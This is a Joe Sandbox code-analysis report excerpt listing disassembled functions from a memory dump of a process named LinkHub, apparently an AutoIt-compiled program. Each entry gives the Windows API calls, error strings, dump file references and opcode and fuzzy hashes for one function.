API String ID: 3864802216-0
Opcode ID: 6b8d2afccf25ea4f52c5828447f5448c446b749f1914125254d854009fefa913
Instruction ID: 2f608198b98e050b816e8bef7d09854b30117dab6dd2937650089f87b6b6939b
Opcode Fuzzy Hash: 6b8d2afccf25ea4f52c5828447f5448c446b749f1914125254d854009fefa913
Instruction Fuzzy Hash: 23319C76201214BFEB259F50CC89FEB3BA9FF4A711F044065FE099A291C6B59D41C7A0

Function 00C35A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00C35A64
NULL Pointer assignment, xrefs: 00C35A8B, 00C35DE0

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 4053f47cd3930a7748ca1799c8450c0e9d99449cfe96ce14de51448f3551f1af
Instruction ID: 9d2cf067093d2a006e1b57bf9d7d0fdeb97a5878d2b1a795e933a2787b5bd18d
Opcode Fuzzy Hash: 4053f47cd3930a7748ca1799c8450c0e9d99449cfe96ce14de51448f3551f1af
Instruction Fuzzy Hash: 6DD1C175A1070A9FDF10DFA8D885BAEB7B5FF48304F148169E915AB280E770EE85CB50

Function 00BF18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00BF1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00BF194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00BF19D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00BF1B7B,?,00BF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00BF1A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00BF1A7B

Part of subcall function 00BE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BD0165,?,?,00C211D9,0000FFFF), ref: 00BE3BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00BF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00BF1AF7
__freea.LIBCMT ref: 00BF1B22
__freea.LIBCMT ref: 00BF1B2E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 77499dad359dfd7624ed0c039c34a8d7aaabfa08eb95f291ddb10b9f0f337bed
Instruction ID: 2d7ffb9bd03607f6857593ad62136d030e7275687f35962d1a1a05449bf16fff
Opcode Fuzzy Hash: 77499dad359dfd7624ed0c039c34a8d7aaabfa08eb95f291ddb10b9f0f337bed
Instruction Fuzzy Hash: 3691D371E0024EDADB218E68C891AFEBBF5EF09310F184D99EA15E7141E735CC49C7A0

Function 00C34F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C350A5
VariantInit.OLEAUT32(?), ref: 00C351A6
VariantClear.OLEAUT32(?), ref: 00C351B0
VariantClear.OLEAUT32(?), ref: 00C3520D

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00C35189
Null Object assignment in FOR..IN loop, xrefs: 00C35035, 00C35163, 00C3521B

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: e63005649c4f3c8661097b18c7539d35035d02a8b2f73c6f9445f6a6ca7de1b0
Instruction ID: dd6d8ffd6a7a4702c2937176491351c96ba1e5371c33c25c1cbd8177e293320e
Opcode Fuzzy Hash: e63005649c4f3c8661097b18c7539d35035d02a8b2f73c6f9445f6a6ca7de1b0
Instruction Fuzzy Hash: 8291AC71A10619ABDF24CFA5CC88FAFBBB8EF45314F108559F915AB280D7709A45CFA0

Function 00C21B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C21C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C21C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00C21C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C21C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C21D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C21D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C21DEF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 41a94a6a50e2370348814e42377a7afe9fab4970b09cc2f6d8b4f2aaaf5f997e
Instruction ID: c722d7de39e8fbc479aca45b150d96abec5a744d981120370e855b349e2687c5
Opcode Fuzzy Hash: 41a94a6a50e2370348814e42377a7afe9fab4970b09cc2f6d8b4f2aaaf5f997e
Instruction Fuzzy Hash: C9910179A00229AFDB01DF94E884BBEB7B4FF54711F184069ED11EB691D774A940CB90

Function 00C343A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C343C8
CharUpperBuffW.USER32(?,?), ref: 00C344D7
_wcslen.LIBCMT ref: 00C344E7
VariantClear.OLEAUT32(?), ref: 00C3467C

Part of subcall function 00C2169E: VariantInit.OLEAUT32(00000000), ref: 00C216DE
Part of subcall function 00C2169E: VariantCopy.OLEAUT32(?,?), ref: 00C216E7
Part of subcall function 00C2169E: VariantClear.OLEAUT32(?), ref: 00C216F3

Strings

AUTOIT.ERROR, xrefs: 00C344DD, 00C344E2
Incorrect Parameter format, xrefs: 00C34403, 00C345FE

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: a4c696fe30e939f37b30d886390b6fc399fcc7ffa193b636a1e04aa40d36da09
Instruction ID: edb77ef21faa55140b1c9b2a6605f17f6f6e41a07661631c6ea8b8e1dc5a3c54
Opcode Fuzzy Hash: a4c696fe30e939f37b30d886390b6fc399fcc7ffa193b636a1e04aa40d36da09
Instruction Fuzzy Hash: A4917874A183019FC704EF24C48196AB7E5FF89714F14896EF89A9B351DB71ED06CB82

Function 00C3560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00C108FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C10831,80070057,?,?,?,00C10C4E), ref: 00C1091B
Part of subcall function 00C108FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C10831,80070057,?,?), ref: 00C10936
Part of subcall function 00C108FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C10831,80070057,?,?), ref: 00C10944
Part of subcall function 00C108FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C10831,80070057,?), ref: 00C10954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C356AE
_wcslen.LIBCMT ref: 00C357B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C3582C
CoTaskMemFree.OLE32(?), ref: 00C35837

Strings

NULL Pointer assignment, xrefs: 00C35880, 00C358AF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 7cbf101f708bee214b54de3d6a148d004b61ca0fd252086096e7cffa7bd4a5a4
Instruction ID: 86a9c8f4569bc01f38b2e6d44e6effcb4fabe56f2938c00799c50b9c3475ed36
Opcode Fuzzy Hash: 7cbf101f708bee214b54de3d6a148d004b61ca0fd252086096e7cffa7bd4a5a4
Instruction Fuzzy Hash: CE910775D10219EFDF10DFA4D881EEEB7B9BF08304F1045A9E915A7291EB749A44CFA0

Function 00C42B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C42C1F
GetMenuItemCount.USER32(00000000), ref: 00C42C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C42C79
_wcslen.LIBCMT ref: 00C42CAF
GetMenuItemID.USER32(?,?), ref: 00C42CE9
GetSubMenu.USER32(?,?), ref: 00C42CF7

Part of subcall function 00C14393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C143AD
Part of subcall function 00C14393: GetCurrentThreadId.KERNEL32 ref: 00C143B4
Part of subcall function 00C14393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C12F00), ref: 00C143BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C42D7F

Part of subcall function 00C1F292: Sleep.KERNEL32 ref: 00C1F30A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 4acc2c58cb98586d2857ea9a7014d6b4c0c50048950bca4fc03a349c6c13f990
Instruction ID: d0ca8fc2f3973ba4ffec5aa6b013df728b7522a38c0ce3ef6e5f62a73b3c11f4
Opcode Fuzzy Hash: 4acc2c58cb98586d2857ea9a7014d6b4c0c50048950bca4fc03a349c6c13f990
Instruction Fuzzy Hash: C9717D75E00215AFCB14EF64C885AAEBBF5FF48310F548499F826AB351DB74AE41CB90

Function 00C488F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C48992
IsWindowEnabled.USER32(00000000), ref: 00C4899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00C48A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00C48AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00C48AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00C48B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C48B1E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 355f0d62f02a129d24c2752643cf4180c7d76348f54b7e23cb9e9e84ba67eeba
Instruction ID: b159192f94ba003c287447a5baf423ad64e8dda2e5c562f76c1725233e32822b
Opcode Fuzzy Hash: 355f0d62f02a129d24c2752643cf4180c7d76348f54b7e23cb9e9e84ba67eeba
Instruction Fuzzy Hash: 1971BF74600604AFDF21DF54C884FFEBBB5FF59310F14045AE865A72A1CB71AA88EB11

Function 00C1B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C1B8C0
GetKeyboardState.USER32(?), ref: 00C1B8D5
SetKeyboardState.USER32(?), ref: 00C1B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C1B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C1B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C1B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C1B9E7

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c917b61f0256cb3a76ba12ba1339b5d0b3dd99bff229594909846067f5154b99
Instruction ID: aed1566470340ffb1b5823c45810afd4c7d674d96a8c7f630cd9744cf72c1e0a
Opcode Fuzzy Hash: c917b61f0256cb3a76ba12ba1339b5d0b3dd99bff229594909846067f5154b99
Instruction Fuzzy Hash: C051AFA06087D53EFB3646388855BFABEA95F07704F088489F1E9458D2C398AEC5FB51

Function 00C1B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C1B6E0
GetKeyboardState.USER32(?), ref: 00C1B6F5
SetKeyboardState.USER32(?), ref: 00C1B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C1B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C1B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C1B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C1B7FF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 27e57c22ff9d5015d1f8c67d474fd7ec1e105ec5802d9b8c7299d07ed777b8a5
Instruction ID: 93bafdac464e2c4a1e6d976b6cbad7db11da034e569f31969d587498adb64ad4
Opcode Fuzzy Hash: 27e57c22ff9d5015d1f8c67d474fd7ec1e105ec5802d9b8c7299d07ed777b8a5
Instruction Fuzzy Hash: 8751D6A09086D53EFB3642248C55BF6BE995B47704F088489F0E5468D2D394EED4FFA0

Function 00BE57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00BE5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00BE57E3
__fassign.LIBCMT ref: 00BE585E
__fassign.LIBCMT ref: 00BE5879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00BE589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00BE5F16,00000000,?,?,?,?,?,?,?,?,?,00BE5F16,?), ref: 00BE58BE
WriteFile.KERNEL32(?,?,00000001,00BE5F16,00000000,?,?,?,?,?,?,?,?,?,00BE5F16,?), ref: 00BE58F7

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1f59765b0dc09fa47689668cd089e0da12d12cbee74363b4425171e9a418f64f
Instruction ID: 407459e23773e72a99d404e4f05be9b915e7b62ce5f4d29e035eed1578f08f56
Opcode Fuzzy Hash: 1f59765b0dc09fa47689668cd089e0da12d12cbee74363b4425171e9a418f64f
Instruction Fuzzy Hash: A851B575900689DFDB20CFA9D885BEEBBF8FF09310F14419AE956E7291D730A941CB60

Function 00BD3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00BD30BB
___except_validate_context_record.LIBVCRUNTIME ref: 00BD30C3
_ValidateLocalCookies.LIBCMT ref: 00BD3151
__IsNonwritableInCurrentImage.LIBCMT ref: 00BD317C
_ValidateLocalCookies.LIBCMT ref: 00BD31D1

Strings

csm, xrefs: 00BD3166

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 022986606f83f69aa8d8cf2c3c82f25daee41158ffab235a1a34e27b83a73563
Instruction ID: d5af062fd0d9f1d2e4859b253188403d85ddc639a438ecda36fe7f933361172b
Opcode Fuzzy Hash: 022986606f83f69aa8d8cf2c3c82f25daee41158ffab235a1a34e27b83a73563
Instruction Fuzzy Hash: F8418034A002099BCF10DF68C885BAEFBF5EF45B54F148196E815AB393E7319B45CB92

Function 00C31B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C33AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C33AD7
Part of subcall function 00C33AAB: _wcslen.LIBCMT ref: 00C33AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C31B6F
WSAGetLastError.WSOCK32 ref: 00C31B7E
WSAGetLastError.WSOCK32 ref: 00C31C26
closesocket.WSOCK32(00000000), ref: 00C31C56

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 832b806377f437012c2dc241c84ccd2aa7010c6b56b66bd77ad3506e72230c92
Instruction ID: 24494825df4acbe063a5d26b6b6abb300253930a8f85231d16936cf2ab172b31
Opcode Fuzzy Hash: 832b806377f437012c2dc241c84ccd2aa7010c6b56b66bd77ad3506e72230c92
Instruction Fuzzy Hash: 7541C175610104AFDB10AF24C884BB9BBE9FF45328F188059FC169B292D774EE41CBE1

Function 00C1D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C1D7CD,?), ref: 00C1E714

Part of subcall function 00C1E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C1D7CD,?), ref: 00C1E72D

lstrcmpiW.KERNEL32(?,?), ref: 00C1D7F0
MoveFileW.KERNEL32(?,?), ref: 00C1D82A
_wcslen.LIBCMT ref: 00C1D8B0
_wcslen.LIBCMT ref: 00C1D8C6
SHFileOperationW.SHELL32(?), ref: 00C1D90C

Strings

\*.*, xrefs: 00C1D89E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: e098892cedbdaa224f338240375a1eb7c3a5c0fb6a6c8dd081e004d67d8e29f2
Instruction ID: e9f4ad0f8d9a1cf2fb785b2242723271d90e5fc3ff64310b55f794ad7e2bb55f
Opcode Fuzzy Hash: e098892cedbdaa224f338240375a1eb7c3a5c0fb6a6c8dd081e004d67d8e29f2
Instruction Fuzzy Hash: 6A4146719452189FDF12EFA4D985BDE77F8AF0A340F1000E6A51AEB181EB74A7C8DB50

Function 00C43899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00C438B8
GetWindowLongW.USER32(?,000000F0), ref: 00C438EB
GetWindowLongW.USER32(?,000000F0), ref: 00C43920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00C43952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00C4397C
GetWindowLongW.USER32(?,000000F0), ref: 00C4398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C439A7

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 52e8f78a3491c1cae80ddea59b776e1ffb18bb79741f6efcb11306777aa6f6a8
